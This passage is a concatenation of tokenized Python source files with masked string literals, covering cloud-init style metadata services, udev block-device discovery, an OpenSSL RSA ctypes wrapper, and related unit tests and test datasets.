split ( ) <EOL> if key in UDEV_PROPERTIES : <EOL> spec [ key ] = value <EOL> return spec <EOL> def blockdevreport ( blockdev ) : <EOL> """<STR_LIT>""" <EOL> cmd = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> blockdev <EOL> ] <EOL> opts = [ o [ <NUM_LIT:5> : ] for o in cmd if o . startswith ( '<STR_LIT>' ) ] <EOL> report = utils . execute ( * cmd , check_exit_code = [ <NUM_LIT:0> ] ) [ <NUM_LIT:0> ] <EOL> return dict ( zip ( opts , report . splitlines ( ) ) ) <EOL> def extrareport ( dev ) : <EOL> """<STR_LIT>""" <EOL> spec = { } <EOL> name = os . path . basename ( dev ) <EOL> try : <EOL> with open ( '<STR_LIT>' . format ( name ) ) as file : <EOL> spec [ '<STR_LIT>' ] = file . read ( ) . strip ( ) <EOL> except Exception : <EOL> pass <EOL> for key in ( '<STR_LIT:state>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> try : <EOL> with open ( '<STR_LIT>' . format ( name , key ) ) as file : <EOL> spec [ key ] = file . read ( ) . strip ( ) <EOL> except Exception : <EOL> pass <EOL> return spec <EOL> def is_block_device ( filepath ) : <EOL> """<STR_LIT>""" <EOL> mode = os . stat ( filepath ) . st_mode <EOL> return stat . S_ISBLK ( mode ) <EOL> def scsi_address_list ( ) : <EOL> scsi_sg_path = '<STR_LIT>' <EOL> try : <EOL> scsi_devices = open ( scsi_sg_path + '<STR_LIT>' ) . read ( ) . splitlines ( ) <EOL> except IOError : <EOL> return [ ] <EOL> else : <EOL> return [ '<STR_LIT::>' . join ( dev . split ( ) [ : <NUM_LIT:4> ] ) for dev in scsi_devices ] <EOL> def scsi_address ( dev ) : <EOL> for address in scsi_address_list ( ) : <EOL> scsi_path = '<STR_LIT>' % address <EOL> if dev == os . path . join ( '<STR_LIT>' , os . 
listdir ( scsi_path ) [ <NUM_LIT:0> ] ) : <EOL> return address <EOL> def get_block_devices_from_udev_db ( ) : <EOL> return get_block_data_from_udev ( '<STR_LIT>' ) <EOL> def get_partitions_from_udev_db ( ) : <EOL> return get_block_data_from_udev ( '<STR_LIT>' ) <EOL> def get_vg_devices_from_udev_db ( ) : <EOL> return get_block_data_from_udev ( '<STR_LIT>' , vg = True ) <EOL> def _is_valid_dev_type ( device_info , vg ) : <EOL> """<STR_LIT>""" <EOL> if ( <EOL> '<STR_LIT>' in device_info and <EOL> int ( device_info [ '<STR_LIT>' ] ) not in VALID_MAJORS <EOL> ) : <EOL> return False <EOL> if any ( <EOL> os . path . basename ( device_info [ '<STR_LIT>' ] ) . startswith ( n ) <EOL> for n in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) : <EOL> return False <EOL> if '<STR_LIT>' not in device_info : <EOL> return False <EOL> if ( vg and '<STR_LIT>' in device_info or <EOL> not vg and '<STR_LIT>' not in device_info ) : <EOL> return True <EOL> else : <EOL> return False <EOL> def get_block_data_from_udev ( devtype , vg = False ) : <EOL> devs = [ ] <EOL> output = utils . execute ( '<STR_LIT>' , '<STR_LIT:info>' , '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> for device in output . split ( '<STR_LIT>' ) : <EOL> if '<STR_LIT>' in device and '<STR_LIT>' % devtype in device : <EOL> device_info = dict ( ( line . partition ( '<STR_LIT:=>' ) [ <NUM_LIT:0> ] , line . partition ( '<STR_LIT:=>' ) [ <NUM_LIT:2> ] ) <EOL> for line in device . split ( '<STR_LIT:\n>' ) <EOL> if line . startswith ( '<STR_LIT>' ) ) <EOL> if _is_valid_dev_type ( device_info , vg ) : <EOL> devs . append ( device_info [ '<STR_LIT>' ] ) <EOL> return devs <EOL> def list_block_devices ( disks = True ) : <EOL> """<STR_LIT>""" <EOL> bdevs = [ ] <EOL> devs = get_block_devices_from_udev_db ( ) <EOL> for device in devs : <EOL> bdev = get_device_info ( device , disks ) <EOL> if bdev : <EOL> bdevs . 
append ( bdev ) <EOL> return bdevs <EOL> def get_device_ids ( device ) : <EOL> uspec = udevreport ( device ) <EOL> if '<STR_LIT>' not in uspec : <EOL> return None <EOL> paths = [ ] <EOL> for element in uspec [ '<STR_LIT>' ] : <EOL> regex = re . search ( r'<STR_LIT>' , element ) <EOL> if regex : <EOL> val = regex . group ( <NUM_LIT:0> ) <EOL> paths . append ( val ) <EOL> return { '<STR_LIT:name>' : device , '<STR_LIT>' : paths } <EOL> def get_device_info ( device , disks = True ) : <EOL> try : <EOL> uspec = udevreport ( device ) <EOL> espec = extrareport ( device ) <EOL> bspec = blockdevreport ( device ) <EOL> except ( KeyError , ValueError , TypeError , <EOL> errors . ProcessExecutionError ) as e : <EOL> LOG . warning ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> device , e ) <EOL> return <EOL> if disks and not is_disk ( device , bspec = bspec , uspec = uspec ) : <EOL> return <EOL> bdev = { <EOL> '<STR_LIT>' : device , <EOL> '<STR_LIT>' : uspec , <EOL> '<STR_LIT>' : bspec , <EOL> '<STR_LIT>' : espec <EOL> } <EOL> return bdev <EOL> def match_device ( uspec1 , uspec2 ) : <EOL> """<STR_LIT>""" <EOL> if ( '<STR_LIT>' in uspec1 and '<STR_LIT>' in uspec2 <EOL> and uspec1 [ '<STR_LIT>' ] != uspec2 [ '<STR_LIT>' ] ) : <EOL> return False <EOL> if ( '<STR_LIT>' in uspec1 and '<STR_LIT>' in uspec2 <EOL> and uspec1 [ '<STR_LIT>' ] != uspec2 [ '<STR_LIT>' ] ) : <EOL> return False <EOL> if ( '<STR_LIT>' in uspec1 and '<STR_LIT>' in uspec2 <EOL> and any ( x . startswith ( '<STR_LIT>' ) for x in <EOL> set ( uspec1 [ '<STR_LIT>' ] ) & set ( uspec2 [ '<STR_LIT>' ] ) ) ) : <EOL> return True <EOL> if ( uspec1 . get ( '<STR_LIT>' ) == uspec2 . get ( '<STR_LIT>' ) is not None <EOL> and uspec1 . get ( '<STR_LIT>' ) == uspec2 . get ( '<STR_LIT>' ) == '<STR_LIT>' ) : <EOL> return True <EOL> if ( uspec1 . get ( '<STR_LIT>' ) == uspec2 . get ( '<STR_LIT>' ) is not None <EOL> and uspec1 . get ( '<STR_LIT>' ) == uspec2 . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> and uspec1 . 
get ( '<STR_LIT>' ) == uspec2 . get ( '<STR_LIT>' ) is not None ) : <EOL> return True <EOL> if ( uspec1 . get ( '<STR_LIT>' ) == uspec2 . get ( '<STR_LIT>' ) <EOL> is not None <EOL> and uspec1 . get ( '<STR_LIT>' ) == uspec2 . get ( '<STR_LIT>' ) == '<STR_LIT>' ) : <EOL> return True <EOL> if uspec1 . get ( '<STR_LIT>' ) == uspec2 . get ( '<STR_LIT>' ) is not None : <EOL> return True <EOL> return False </s>
<s> """<STR_LIT>""" <EOL> import abc <EOL> from itertools import compress <EOL> import six <EOL> import stevedore <EOL> from . command import Command <EOL> @ six . add_metaclass ( abc . ABCMeta ) <EOL> class DisplayCommandBase ( Command ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , app , app_args , cmd_name = None ) : <EOL> super ( DisplayCommandBase , self ) . __init__ ( app , app_args , <EOL> cmd_name = cmd_name ) <EOL> self . _formatter_plugins = self . _load_formatter_plugins ( ) <EOL> @ abc . abstractproperty <EOL> def formatter_namespace ( self ) : <EOL> "<STR_LIT>" <EOL> @ abc . abstractproperty <EOL> def formatter_default ( self ) : <EOL> "<STR_LIT>" <EOL> def _load_formatter_plugins ( self ) : <EOL> return stevedore . ExtensionManager ( <EOL> self . formatter_namespace , <EOL> invoke_on_load = True , <EOL> ) <EOL> def get_parser ( self , prog_name ) : <EOL> parser = super ( DisplayCommandBase , self ) . get_parser ( prog_name ) <EOL> formatter_group = parser . add_argument_group ( <EOL> title = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> ) <EOL> formatter_choices = sorted ( self . _formatter_plugins . names ( ) ) <EOL> formatter_default = self . formatter_default <EOL> if formatter_default not in formatter_choices : <EOL> formatter_default = formatter_choices [ <NUM_LIT:0> ] <EOL> formatter_group . add_argument ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> choices = formatter_choices , <EOL> default = formatter_default , <EOL> help = '<STR_LIT>' % formatter_default , <EOL> ) <EOL> formatter_group . add_argument ( <EOL> '<STR_LIT:-c>' , '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> default = [ ] , <EOL> dest = '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' , <EOL> ) <EOL> for formatter in self . _formatter_plugins : <EOL> formatter . obj . add_argument_group ( parser ) <EOL> return parser <EOL> @ abc . 
abstractmethod <EOL> def produce_output ( self , parsed_args , column_names , data ) : <EOL> """<STR_LIT>""" <EOL> def run ( self , parsed_args ) : <EOL> self . formatter = self . _formatter_plugins [ parsed_args . formatter ] . obj <EOL> column_names , data = self . take_action ( parsed_args ) <EOL> self . produce_output ( parsed_args , column_names , data ) <EOL> return <NUM_LIT:0> <EOL> @ staticmethod <EOL> def _compress_iterable ( iterable , selectors ) : <EOL> return compress ( iterable , selectors ) </s>
<s> import posixpath <EOL> import re <EOL> from oauthlib import oauth1 <EOL> from oslo_config import cfg <EOL> from oslo_log import log as oslo_logging <EOL> from six . moves . urllib import error <EOL> from six . moves . urllib import request <EOL> from cloudbaseinit . metadata . services import base <EOL> from cloudbaseinit . utils import x509constants <EOL> opts = [ <EOL> cfg . StrOpt ( '<STR_LIT>' , default = None , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , default = "<STR_LIT>" , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , default = "<STR_LIT>" , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , default = "<STR_LIT>" , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , default = "<STR_LIT>" , <EOL> help = '<STR_LIT>' ) , <EOL> ] <EOL> CONF = cfg . CONF <EOL> CONF . register_opts ( opts ) <EOL> LOG = oslo_logging . getLogger ( __name__ ) <EOL> class _Realm ( str ) : <EOL> def __bool__ ( self ) : <EOL> return True <EOL> __nonzero__ = __bool__ <EOL> class MaaSHttpService ( base . BaseMetadataService ) : <EOL> _METADATA_2012_03_01 = '<STR_LIT>' <EOL> def __init__ ( self ) : <EOL> super ( MaaSHttpService , self ) . __init__ ( ) <EOL> self . _enable_retry = True <EOL> self . _metadata_version = self . _METADATA_2012_03_01 <EOL> def load ( self ) : <EOL> super ( MaaSHttpService , self ) . load ( ) <EOL> if not CONF . maas_metadata_url : <EOL> LOG . debug ( '<STR_LIT>' ) <EOL> else : <EOL> try : <EOL> self . _get_cache_data ( '<STR_LIT>' % self . _metadata_version ) <EOL> return True <EOL> except Exception as ex : <EOL> LOG . exception ( ex ) <EOL> LOG . debug ( '<STR_LIT>' % <EOL> CONF . maas_metadata_url ) <EOL> return False <EOL> def _get_response ( self , req ) : <EOL> try : <EOL> return request . urlopen ( req ) <EOL> except error . HTTPError as ex : <EOL> if ex . code == <NUM_LIT> : <EOL> raise base . 
NotExistingMetadataException ( ) <EOL> else : <EOL> raise <EOL> def _get_oauth_headers ( self , url ) : <EOL> client = oauth1 . Client ( <EOL> CONF . maas_oauth_consumer_key , <EOL> client_secret = CONF . maas_oauth_consumer_secret , <EOL> resource_owner_key = CONF . maas_oauth_token_key , <EOL> resource_owner_secret = CONF . maas_oauth_token_secret , <EOL> signature_method = oauth1 . SIGNATURE_PLAINTEXT ) <EOL> realm = _Realm ( "<STR_LIT>" ) <EOL> headers = client . sign ( url , realm = realm ) [ <NUM_LIT:1> ] <EOL> return headers <EOL> def _get_data ( self , path ) : <EOL> norm_path = posixpath . join ( CONF . maas_metadata_url , path ) <EOL> oauth_headers = self . _get_oauth_headers ( norm_path ) <EOL> LOG . debug ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : norm_path } ) <EOL> req = request . Request ( norm_path , headers = oauth_headers ) <EOL> response = self . _get_response ( req ) <EOL> return response . read ( ) <EOL> def get_host_name ( self ) : <EOL> return self . _get_cache_data ( '<STR_LIT>' % <EOL> self . _metadata_version , decode = True ) <EOL> def get_instance_id ( self ) : <EOL> return self . _get_cache_data ( '<STR_LIT>' % <EOL> self . _metadata_version , decode = True ) <EOL> def get_public_keys ( self ) : <EOL> return self . _get_cache_data ( '<STR_LIT>' % <EOL> self . _metadata_version , <EOL> decode = True ) . splitlines ( ) <EOL> def get_client_auth_certs ( self ) : <EOL> certs_data = self . _get_cache_data ( '<STR_LIT>' % <EOL> self . _metadata_version , <EOL> decode = True ) <EOL> pattern = r"<STR_LIT>" . format ( <EOL> begin = x509constants . PEM_HEADER , <EOL> end = x509constants . PEM_FOOTER ) <EOL> return re . findall ( pattern , certs_data ) <EOL> def get_user_data ( self ) : <EOL> return self . _get_cache_data ( '<STR_LIT>' % self . _metadata_version ) </s>
<s> from oslo_log import log as oslo_logging <EOL> from cloudbaseinit . osutils import factory <EOL> from cloudbaseinit . plugins . common . userdataplugins . cloudconfigplugins import ( <EOL> base <EOL> ) <EOL> LOG = oslo_logging . getLogger ( __name__ ) <EOL> class SetTimezonePlugin ( base . BaseCloudConfigPlugin ) : <EOL> """<STR_LIT>""" <EOL> def process ( self , data ) : <EOL> LOG . info ( "<STR_LIT>" , data ) <EOL> osutils = factory . get_os_utils ( ) <EOL> osutils . set_timezone ( data ) </s>
<s> import unittest <EOL> try : <EOL> import unittest . mock as mock <EOL> except ImportError : <EOL> import mock <EOL> from cloudbaseinit import exception <EOL> from cloudbaseinit . metadata import factory <EOL> from cloudbaseinit . tests import testutils <EOL> class MetadataServiceFactoryTests ( unittest . TestCase ) : <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def _test_get_metadata_service ( self , mock_load_class , <EOL> ret_value = mock . MagicMock ( ) , <EOL> load_exception = False ) : <EOL> mock_load_class . side_effect = ret_value <EOL> if load_exception : <EOL> mock_load_class ( ) ( ) . load . side_effect = Exception <EOL> with self . assertRaises ( exception . CloudbaseInitException ) : <EOL> factory . get_metadata_service ( ) <EOL> return <EOL> if ret_value is exception . CloudbaseInitException : <EOL> self . assertRaises ( exception . CloudbaseInitException , <EOL> factory . get_metadata_service ) <EOL> else : <EOL> response = factory . get_metadata_service ( ) <EOL> self . assertEqual ( mock_load_class ( ) ( ) , response ) <EOL> def test_get_metadata_service ( self ) : <EOL> self . _test_get_metadata_service ( ) <EOL> def test_get_metadata_service_exception ( self ) : <EOL> self . _test_get_metadata_service ( <EOL> ret_value = exception . CloudbaseInitException ) <EOL> def test_get_metadata_service_load_exception ( self ) : <EOL> with testutils . LogSnatcher ( '<STR_LIT>' <EOL> '<STR_LIT>' ) : <EOL> self . _test_get_metadata_service ( load_exception = True ) </s>
<s> import unittest <EOL> try : <EOL> import unittest . mock as mock <EOL> except ImportError : <EOL> import mock <EOL> from oslo_config import cfg <EOL> from cloudbaseinit import exception <EOL> from cloudbaseinit . plugins . windows import ntpclient <EOL> CONF = cfg . CONF <EOL> class NTPClientPluginTests ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . _ntpclient = ntpclient . NTPClientPlugin ( ) <EOL> def test_set_ntp_trigger_mode ( self ) : <EOL> mock_osutils = mock . Mock ( ) <EOL> self . _ntpclient . _set_ntp_trigger_mode ( mock_osutils ) <EOL> mock_osutils . execute_system32_process . assert_called_once_with ( <EOL> [ "<STR_LIT>" , "<STR_LIT>" , ntpclient . _W32TIME_SERVICE , <EOL> "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def _test_check_w32time_svc_status ( self , mock_set_ntp_trigger_mode , <EOL> mock_sleep , start_mode , <EOL> fail_service_start , <EOL> patch_check_os_version = True ) : <EOL> mock_osutils = mock . MagicMock ( ) <EOL> mock_osutils . SERVICE_START_MODE_AUTOMATIC = "<STR_LIT>" <EOL> mock_osutils . SERVICE_STATUS_RUNNING = "<STR_LIT>" <EOL> mock_osutils . SERVICE_STATUS_STOPPED = "<STR_LIT>" <EOL> mock_osutils . get_service_start_mode . return_value = start_mode <EOL> mock_osutils . check_os_version . return_value = patch_check_os_version <EOL> if fail_service_start : <EOL> mock_osutils . get_service_status . return_value = "<STR_LIT>" <EOL> self . assertRaises ( exception . CloudbaseInitException , <EOL> self . _ntpclient . verify_time_service , <EOL> mock_osutils ) <EOL> else : <EOL> mock_osutils . get_service_status . side_effect = [ <EOL> "<STR_LIT>" , mock_osutils . SERVICE_STATUS_RUNNING ] <EOL> self . _ntpclient . verify_time_service ( osutils = mock_osutils ) <EOL> if start_mode != mock_osutils . SERVICE_START_MODE_AUTOMATIC : <EOL> mock_osutils . set_service_start_mode . assert_called_once_with ( <EOL> ntpclient . 
_W32TIME_SERVICE , <EOL> mock_osutils . SERVICE_START_MODE_AUTOMATIC ) <EOL> mock_sleep . assert_called_once_with ( <NUM_LIT:1> ) <EOL> mock_osutils . start_service . assert_called_once_with ( <EOL> ntpclient . _W32TIME_SERVICE ) <EOL> mock_osutils . get_service_start_mode . assert_called_once_with ( <EOL> ntpclient . _W32TIME_SERVICE ) <EOL> mock_osutils . get_service_status . assert_called_with ( <EOL> ntpclient . _W32TIME_SERVICE ) <EOL> mock_osutils . check_os_version . assert_called_once_with ( <NUM_LIT:6> , <NUM_LIT:1> ) <EOL> if patch_check_os_version : <EOL> mock_set_ntp_trigger_mode . assert_called_once_with ( mock_osutils ) <EOL> else : <EOL> self . assertFalse ( mock_set_ntp_trigger_mode . called ) <EOL> def test_check_w32time_svc_status_other_start_mode ( self ) : <EOL> self . _test_check_w32time_svc_status ( start_mode = "<STR_LIT>" , <EOL> fail_service_start = False ) <EOL> def test_check_w32time_svc_status_start_automatic ( self ) : <EOL> self . _test_check_w32time_svc_status ( start_mode = "<STR_LIT>" , <EOL> fail_service_start = False ) <EOL> def test_check_w32time_svc_status_exception ( self ) : <EOL> self . _test_check_w32time_svc_status ( start_mode = "<STR_LIT>" , <EOL> fail_service_start = True ) <EOL> def test_check_w32time_older_oses ( self ) : <EOL> self . _test_check_w32time_svc_status ( start_mode = "<STR_LIT>" , <EOL> fail_service_start = False , <EOL> patch_check_os_version = False ) </s>
<s> import base64 <EOL> import ctypes <EOL> import ctypes . util <EOL> import struct <EOL> import sys <EOL> if sys . platform == "<STR_LIT:win32>" : <EOL> openssl_lib_path = "<STR_LIT>" <EOL> else : <EOL> openssl_lib_path = ctypes . util . find_library ( "<STR_LIT>" ) <EOL> openssl = ctypes . CDLL ( openssl_lib_path ) <EOL> clib = ctypes . CDLL ( ctypes . util . find_library ( "<STR_LIT:c>" ) ) <EOL> class RSA ( ctypes . Structure ) : <EOL> _fields_ = [ <EOL> ( "<STR_LIT>" , ctypes . c_int ) , <EOL> ( "<STR_LIT:version>" , ctypes . c_long ) , <EOL> ( "<STR_LIT>" , ctypes . c_void_p ) , <EOL> ( "<STR_LIT>" , ctypes . c_void_p ) , <EOL> ( "<STR_LIT:n>" , ctypes . c_void_p ) , <EOL> ( "<STR_LIT:e>" , ctypes . c_void_p ) , <EOL> ( "<STR_LIT:d>" , ctypes . c_void_p ) , <EOL> ( "<STR_LIT:p>" , ctypes . c_void_p ) , <EOL> ( "<STR_LIT:q>" , ctypes . c_void_p ) , <EOL> ( "<STR_LIT>" , ctypes . c_void_p ) , <EOL> ( "<STR_LIT>" , ctypes . c_void_p ) , <EOL> ( "<STR_LIT>" , ctypes . c_void_p ) , <EOL> ( "<STR_LIT>" , ctypes . c_void_p ) , <EOL> ( "<STR_LIT>" , ctypes . c_int ) , <EOL> ( "<STR_LIT>" , ctypes . c_int ) , <EOL> ( "<STR_LIT>" , ctypes . c_int ) , <EOL> ( "<STR_LIT>" , ctypes . c_void_p ) , <EOL> ( "<STR_LIT>" , ctypes . c_void_p ) , <EOL> ( "<STR_LIT>" , ctypes . c_void_p ) , <EOL> ( "<STR_LIT>" , ctypes . c_char_p ) , <EOL> ( "<STR_LIT>" , ctypes . c_void_p ) , <EOL> ( "<STR_LIT>" , ctypes . c_void_p ) <EOL> ] <EOL> openssl . RSA_PKCS1_PADDING = <NUM_LIT:1> <EOL> openssl . RSA_new . restype = ctypes . POINTER ( RSA ) <EOL> openssl . BN_bin2bn . restype = ctypes . c_void_p <EOL> openssl . BN_bin2bn . argtypes = [ ctypes . c_char_p , ctypes . c_int , ctypes . c_void_p ] <EOL> openssl . BN_new . restype = ctypes . c_void_p <EOL> openssl . RSA_size . restype = ctypes . c_int <EOL> openssl . RSA_size . argtypes = [ ctypes . POINTER ( RSA ) ] <EOL> openssl . RSA_public_encrypt . argtypes = [ ctypes . c_int , <EOL> ctypes . c_char_p , <EOL> ctypes . 
c_char_p , <EOL> ctypes . POINTER ( RSA ) , <EOL> ctypes . c_int ] <EOL> openssl . RSA_public_encrypt . restype = ctypes . c_int <EOL> openssl . RSA_free . argtypes = [ ctypes . POINTER ( RSA ) ] <EOL> openssl . PEM_write_RSAPublicKey . restype = ctypes . c_int <EOL> openssl . PEM_write_RSAPublicKey . argtypes = [ ctypes . c_void_p , <EOL> ctypes . POINTER ( RSA ) ] <EOL> openssl . ERR_get_error . restype = ctypes . c_long <EOL> openssl . ERR_get_error . argtypes = [ ] <EOL> openssl . ERR_error_string_n . restype = ctypes . c_void_p <EOL> openssl . ERR_error_string_n . argtypes = [ ctypes . c_long , <EOL> ctypes . c_char_p , <EOL> ctypes . c_int ] <EOL> openssl . ERR_load_crypto_strings . restype = ctypes . c_int <EOL> openssl . ERR_load_crypto_strings . argtypes = [ ] <EOL> clib . fopen . restype = ctypes . c_void_p <EOL> clib . fopen . argtypes = [ ctypes . c_char_p , ctypes . c_char_p ] <EOL> clib . fclose . restype = ctypes . c_int <EOL> clib . fclose . argtypes = [ ctypes . c_void_p ] <EOL> class CryptException ( Exception ) : <EOL> pass <EOL> class OpenSSLException ( CryptException ) : <EOL> def __init__ ( self ) : <EOL> message = self . _get_openssl_error_msg ( ) <EOL> super ( OpenSSLException , self ) . __init__ ( message ) <EOL> def _get_openssl_error_msg ( self ) : <EOL> openssl . ERR_load_crypto_strings ( ) <EOL> errno = openssl . ERR_get_error ( ) <EOL> errbuf = ctypes . create_string_buffer ( <NUM_LIT> ) <EOL> openssl . ERR_error_string_n ( errno , errbuf , <NUM_LIT> ) <EOL> return errbuf . value . decode ( "<STR_LIT:ascii>" ) <EOL> class RSAWrapper ( object ) : <EOL> def __init__ ( self , rsa_p ) : <EOL> self . _rsa_p = rsa_p <EOL> def __enter__ ( self ) : <EOL> return self <EOL> def __exit__ ( self , tp , value , tb ) : <EOL> self . free ( ) <EOL> def free ( self ) : <EOL> openssl . RSA_free ( self . _rsa_p ) <EOL> def public_encrypt ( self , clear_text ) : <EOL> flen = len ( clear_text ) <EOL> rsa_size = openssl . RSA_size ( self . 
_rsa_p ) <EOL> enc_text = ctypes . create_string_buffer ( rsa_size ) <EOL> enc_text_len = openssl . RSA_public_encrypt ( flen , <EOL> clear_text , <EOL> enc_text , <EOL> self . _rsa_p , <EOL> openssl . RSA_PKCS1_PADDING ) <EOL> if enc_text_len == - <NUM_LIT:1> : <EOL> raise OpenSSLException ( ) <EOL> return enc_text [ : enc_text_len ] <EOL> class CryptManager ( object ) : <EOL> def load_ssh_rsa_public_key ( self , ssh_pub_key ) : <EOL> ssh_rsa_prefix = "<STR_LIT>" <EOL> if not ssh_pub_key . startswith ( ssh_rsa_prefix ) : <EOL> raise CryptException ( '<STR_LIT>' ) <EOL> s = ssh_pub_key [ len ( ssh_rsa_prefix ) : ] <EOL> idx = s . find ( '<STR_LIT:U+0020>' ) <EOL> if idx >= <NUM_LIT:0> : <EOL> b64_pub_key = s [ : idx ] <EOL> else : <EOL> b64_pub_key = s <EOL> pub_key = base64 . b64decode ( b64_pub_key ) <EOL> offset = <NUM_LIT:0> <EOL> key_type_len = struct . unpack ( '<STR_LIT>' , pub_key [ offset : offset + <NUM_LIT:4> ] ) [ <NUM_LIT:0> ] <EOL> offset += <NUM_LIT:4> <EOL> key_type = pub_key [ offset : offset + key_type_len ] . decode ( '<STR_LIT:utf-8>' ) <EOL> offset += key_type_len <EOL> if key_type not in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> raise CryptException ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % key_type ) <EOL> rsa_p = openssl . RSA_new ( ) <EOL> try : <EOL> rsa_p . contents . e = openssl . BN_new ( ) <EOL> rsa_p . contents . n = openssl . BN_new ( ) <EOL> e_len = struct . unpack ( '<STR_LIT>' , pub_key [ offset : offset + <NUM_LIT:4> ] ) [ <NUM_LIT:0> ] <EOL> offset += <NUM_LIT:4> <EOL> e_key_bin = pub_key [ offset : offset + e_len ] <EOL> offset += e_len <EOL> if not openssl . BN_bin2bn ( e_key_bin , e_len , rsa_p . contents . e ) : <EOL> raise OpenSSLException ( ) <EOL> n_len = struct . 
unpack ( '<STR_LIT>' , pub_key [ offset : offset + <NUM_LIT:4> ] ) [ <NUM_LIT:0> ] <EOL> offset += <NUM_LIT:4> <EOL> n_key_bin = pub_key [ offset : offset + n_len ] <EOL> offset += n_len <EOL> if offset != len ( pub_key ) : <EOL> raise CryptException ( '<STR_LIT>' ) <EOL> if not openssl . BN_bin2bn ( n_key_bin , n_len , rsa_p . contents . n ) : <EOL> raise OpenSSLException ( ) <EOL> return RSAWrapper ( rsa_p ) <EOL> except Exception : <EOL> openssl . RSA_free ( rsa_p ) <EOL> raise </s>
<s> """<STR_LIT>""" <EOL> __title__ = '<STR_LIT>' <EOL> __author__ = '<STR_LIT>' <EOL> __license__ = '<STR_LIT>' <EOL> __copyright__ = '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> from cafe . drivers . unittest . datasets import DatasetList , _Dataset <EOL> from cafe . drivers . unittest . decorators import memoized <EOL> from cloudcafe . common . datasets import ModelBasedDatasetToolkit <EOL> from cloudcafe . blockstorage . composites import VolumesAutoComposite <EOL> try : <EOL> from cloudcafe . compute . datasets import ComputeDatasets <EOL> except Exception as ex : <EOL> import warnings <EOL> msg = "<STR_LIT>" <EOL> warnings . warn ( msg ) <EOL> class ComputeDatasets ( object ) : <EOL> pass <EOL> class BlockstorageDatasets ( ModelBasedDatasetToolkit ) : <EOL> """<STR_LIT>""" <EOL> _volumes = VolumesAutoComposite ( ) <EOL> @ classmethod <EOL> @ memoized <EOL> def _get_volume_types ( cls ) : <EOL> """<STR_LIT>""" <EOL> return cls . _get_model_list ( <EOL> cls . _volumes . client . list_all_volume_types , '<STR_LIT>' ) <EOL> @ classmethod <EOL> def _get_volume_type_names ( cls ) : <EOL> """<STR_LIT>""" <EOL> vtype_names = [ ] <EOL> for vtype in cls . _get_volume_types ( ) : <EOL> vtype_names . append ( vtype . name ) <EOL> return vtype_names <EOL> @ classmethod <EOL> def default_volume_type_model ( cls ) : <EOL> for vtype in cls . _get_volume_types ( ) : <EOL> if ( vtype . id_ == cls . _volumes . config . default_volume_type <EOL> or vtype . name == cls . _volumes . config . default_volume_type ) : <EOL> return vtype <EOL> raise Exception ( "<STR_LIT>" ) <EOL> @ classmethod <EOL> def default_volume_type ( cls ) : <EOL> vol_type = cls . default_volume_type_model ( ) <EOL> dataset = _Dataset ( <EOL> name = vol_type . name , <EOL> data_dict = { <EOL> '<STR_LIT>' : vol_type . name , <EOL> '<STR_LIT>' : vol_type . id_ } ) <EOL> dataset_list = DatasetList ( ) <EOL> dataset_list . append ( dataset ) <EOL> return dataset_list <EOL> @ classmethod <EOL> def volume_types ( <EOL> cls , max_datasets = None , randomize = None , model_filter = None , <EOL> filter_mode = ModelBasedDatasetToolkit . 
INCLUSION_MODE , tags = None ) : <EOL> """<STR_LIT>""" <EOL> volume_type_list = cls . _get_volume_types ( ) <EOL> volume_type_list = cls . _filter_model_list ( <EOL> volume_type_list , model_filter = model_filter , <EOL> filter_mode = filter_mode ) <EOL> dataset_list = DatasetList ( ) <EOL> for vol_type in volume_type_list : <EOL> data = { '<STR_LIT>' : vol_type . name , <EOL> '<STR_LIT>' : vol_type . id_ } <EOL> dataset_list . append_new_dataset ( vol_type . name , data ) <EOL> dataset_list = cls . _modify_dataset_list ( <EOL> dataset_list , max_datasets = max_datasets , randomize = randomize ) <EOL> if tags : <EOL> dataset_list . apply_test_tags ( * tags ) <EOL> return dataset_list <EOL> @ classmethod <EOL> def configured_volume_types ( <EOL> cls , max_datasets = None , randomize = False , tags = None ) : <EOL> """<STR_LIT>""" <EOL> volume_type_filter = cls . _volumes . config . volume_type_filter <EOL> volume_type_filter_mode = cls . _volumes . config . volume_type_filter_mode <EOL> return cls . volume_types ( <EOL> max_datasets = max_datasets , <EOL> randomize = randomize , <EOL> model_filter = volume_type_filter , <EOL> filter_mode = volume_type_filter_mode , <EOL> tags = tags ) <EOL> class ComputeIntegrationDatasets ( ComputeDatasets , BlockstorageDatasets ) : <EOL> @ classmethod <EOL> def images_by_volume_type ( <EOL> cls , max_datasets = None , randomize = False , <EOL> image_filter = None , volume_type_filter = None , <EOL> image_filter_mode = ModelBasedDatasetToolkit . INCLUSION_MODE , <EOL> volume_type_filter_mode = ModelBasedDatasetToolkit . INCLUSION_MODE ) : 